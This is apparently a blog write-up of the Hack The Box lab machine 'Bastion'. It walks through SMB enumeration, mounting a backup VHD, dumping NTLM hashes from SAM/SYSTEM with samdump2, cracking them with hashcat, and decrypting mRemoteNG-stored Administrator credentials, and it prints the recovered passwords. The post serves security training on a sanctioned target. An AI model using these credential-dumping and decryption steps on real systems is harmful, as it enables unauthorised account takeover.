Bastion - [HTB]
![Cover Image for Bastion - [HTB]](/assets/images/blog/Bastion-htb/Bastion.png)
Marmeus
Table of Contents
Introduction
Bastion is an easy windows machine from Hack The Box where the attacker will have to mount a VHD file available in the smb service. Then, will have to crack the stored credentials in order to obtain the user flag. Finally, will have to find and decrypt the credentials from a installed software obtaining a shell as Administrator.
Enumeration
As always, let's start finding all opened ports in the machine with nmap.
kali@kali:~/Documents/HTB/Bastion$ sudo nmap -sS -p- -n -T5 -oN AllPorts.txt 10.10.10.134
Warning: 10.10.10.134 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.134
Host is up (0.041s latency).
Not shown: 65522 closed ports
PORT STATE SERVICE
22/tcp open ssh
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5985/tcp open wsman
47001/tcp open winrm
[...]
# Nmap done at Mon Jul 5 11:24:03 2021 -- 1 IP address (1 host up) scanned in 82.59 secondsThen, we continue with a deeper scan of every opened port, getting more information about each service.
kali@kali:~/Documents/HTB/Bastion$ sudo nmap -sC -sV -n -T5 -oN PortsDepth.txt -p 22,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669,49670 10.10.10.134
Nmap scan report for 10.10.10.134
Host is up (0.052s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
[...]
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -39m52s, deviation: 1h09m15s, median: 6s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-07-05T17:41:39+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-07-05T15:41:40
|_ start_date: 2021-07-05T05:58:41
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul 5 11:41:40 2021 -- 1 IP address (1 host up) scanned in 64.96 secondsBecause there is a smb service let's enumerate its shares.
kali@kali:/media/sf_2_MisPostsBlog/HTB/Bastion$ smbmap -H 10.10.10.134 -u guest
[+] IP: 10.10.10.134:445 Name: 10.10.10.134
[\] Work[!] Unable to remove test directory at \\10.10.10.134\Backups\ZRVPGAGWIF, please remove manually
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
Backups READ, WRITE
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
Looking inside the Backups share there is a note warning us that we shouldn't download the entire share.
kali@kali:/media/sf_2_MisPostsBlog/HTB/Bastion$ smbclient //10.10.10.134/Backups -N
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon Jul 5 12:33:05 2021
.. D 0 Mon Jul 5 12:33:05 2021
nmap-test-file A 260 Mon Jul 5 12:00:49 2021
note.txt AR 116 Tue Apr 16 06:10:09 2019
SDT65CB.tmp A 0 Fri Feb 22 07:43:08 2019
WindowsImageBackup Dn 0 Fri Feb 22 07:44:02 2019
7735807 blocks of size 4096. 2761155 blocks available
smb: \> get note.txt
getting file \note.txt of size 116 as note.txt (0.7 KiloBytes/sec) (average 0.7 KiloBytes/sec)
kali@kali:/media/sf_2_MisPostsBlog/HTB/Bastion/smb$ cat note.txt
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.Searching inside different folders there is a heavy 5GB file named 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd. VHD files are file formats representing a virtual hard disk drive (HDD).
smb: \> cd "WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351"
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> dir
. Dn 0 Fri Feb 22 07:45:32 2019
.. Dn 0 Fri Feb 22 07:45:32 2019
9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd An 37761024 Fri Feb 22 07:44:03 2019
9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd An 5418299392 Fri Feb 22 07:45:32 2019
BackupSpecs.xml An 1186 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml An 1078 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml An 8930 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml An 6542 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml An 2894 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml An 1488 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml An 1484 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml An 3844 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml An 3988 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml An 7110 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml An 2374620 Fri Feb 22 07:45:32 2019
7735807 blocks of size 4096. 2761155 blocks available
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> Because we can not download this file we need to create a network shared folder. For doing so, we need to execute the following commands.
kali@kali:/media/sf_2_MisPostsBlog/HTB/Bastion$ sudo mkdir /mnt/smb
kali@kali:/media/sf_2_MisPostsBlog/HTB/Bastion$ sudo mount -t cifs //10.10.10.134/Backups /mnt/smb/
kali@kali:/mnt/smb$ ls
nmap-test-file note.txt SDT65CB.tmp WindowsImageBackup
Exploitation
Now that we have access to the file we can mount it using guestmount.
kali@kali:/mnt/smb$ sudo apt-get install libguestfs-tools -y
kali@kali:/mnt/smb$ sudo mkdir /mnt/vhd
kali@kali:/mnt/smb/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351$ sudo guestmount --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt/vhd
kali@kali:/mnt/smb/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351$ sudo su
root@kali:/mnt/vhd# ls
'$Recycle.Bin' config.sys pagefile.sys ProgramData Recovery Users
autoexec.bat 'Documents and Settings' PerfLogs 'Program Files' 'System Volume Information' WindowsThe virtual hard drive contains the files SAM and SYSTEM where user credentials are stored, for obtaining them we need to use the tool samdump2.
root@kali:/mnt/vhd/Windows/System32/config# samdump2 SYSTEM SAM | tee /home/kali/Documents/HTB/Bastion/creds.txt
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::Now, hashcat is able to retrieve the L4mpje's password from the NTLM hash.
kali@kali:~/Documents/HTB/Bastion$ hashcat -m 1000 creds.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i5-10210U CPU @ 1.60GHz, 5844/5908 MB (2048 MB allocatable), 4MCU
Host memory required for this attack: 65 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
31d6cfe0d16ae931b73c59d7e0c089c0:
26112010952d963c8dc4217daec986d9:bureaulampje
[...]These credentials can be used to become L4mpje through SSH.
kali@kali:~/Documents/HTB/Bastion$ ssh L4mpje@10.10.10.134
The authenticity of host '10.10.10.134 (10.10.10.134)' can't be established.
ECDSA key fingerprint is SHA256:ILc1g9UC/7j/5b+vXeQ7TIaXLFddAbttU86ZeiM/bNY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.134' (ECDSA) to the list of known hosts.
L4mpje@10.10.10.134's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
l4mpje@BASTION C:\Users\L4mpje> Privilege Escalation
Looking inside the machine's file system appears an unusual program named mRemoteNG. mRemoteNG is a fork of mRemote; an open source, tabbed, multi-protocol, remote connections manager for Windows.
l4mpje@BASTION C:\Program Files (x86)>dir
Volume in drive C has no label.
Volume Serial Number is 0CB3-C487
Directory of C:\Program Files (x86)
22-02-2019 15:01 <DIR> .
22-02-2019 15:01 <DIR> ..
16-07-2016 15:23 <DIR> Common Files
23-02-2019 10:38 <DIR> Internet Explorer
16-07-2016 15:23 <DIR> Microsoft.NET
22-02-2019 15:01 <DIR> mRemoteNG
23-02-2019 11:22 <DIR> Windows Defender
23-02-2019 10:38 <DIR> Windows Mail
23-02-2019 11:22 <DIR> Windows Media Player
16-07-2016 15:23 <DIR> Windows Multimedia Platform
16-07-2016 15:23 <DIR> Windows NT
23-02-2019 11:22 <DIR> Windows Photo Viewer
16-07-2016 15:23 <DIR> Windows Portable Devices
16-07-2016 15:23 <DIR> WindowsPowerShell
0 File(s) 0 bytes
14 Dir(s) 11.308.552.192 bytes free Searching about where credentials are stored, there is a post on reddit telling that are stored at %appdata%\mRemoteNG\confCons.xml .
l4mpje@BASTION C:\Program Files (x86)>type %appdata%\mRemoteNG\confCons.xml
[...]
Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
[...]
Username="L4mpje" Domain="" Password="yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB"Although they are encrypted we can decrypt them using mremoteng_decrypt.
kali@kali:/media/sf_2_MisPostsBlog/HTB/Bastion$ wget https://raw.githubusercontent.com/haseebT/mRemoteNG-Decrypt/master/mremoteng_decrypt.py
--2021-07-05 14:55:13-- https://raw.githubusercontent.com/haseebT/mRemoteNG-Decrypt/master/mremoteng_decrypt.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.109.133, 185.199.110.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1535 (1.5K) [text/plain]
Saving to: ‘mremoteng_decrypt.py’
mremoteng_decrypt.py 100%[=================================================================================>] 1.50K --.-KB/s in 0s
2021-07-05 14:55:13 (3.12 MB/s) - ‘mremoteng_decrypt.py’ saved [1535/1535]
kali@kali:/media/sf_2_MisPostsBlog/HTB/Bastion$ python3 mremoteng_decrypt.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
Password: thXLHM96BeKL0ER2
The Administrator's password can be used to access to the machine as Administrator through SSH, getting the root flag.
kali@kali:~/Documents/HTB/Bastion$ ssh Administrator@10.10.10.134
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
administrator@BASTION C:\Users\Administrator>type Desktop\root.txt
[CENSORED]Finally, if you want to umount the folders under mnt execute the following commands.
root@kali:~# umount /mnt/smb
root@kali:~# guestunmount /mnt/vhd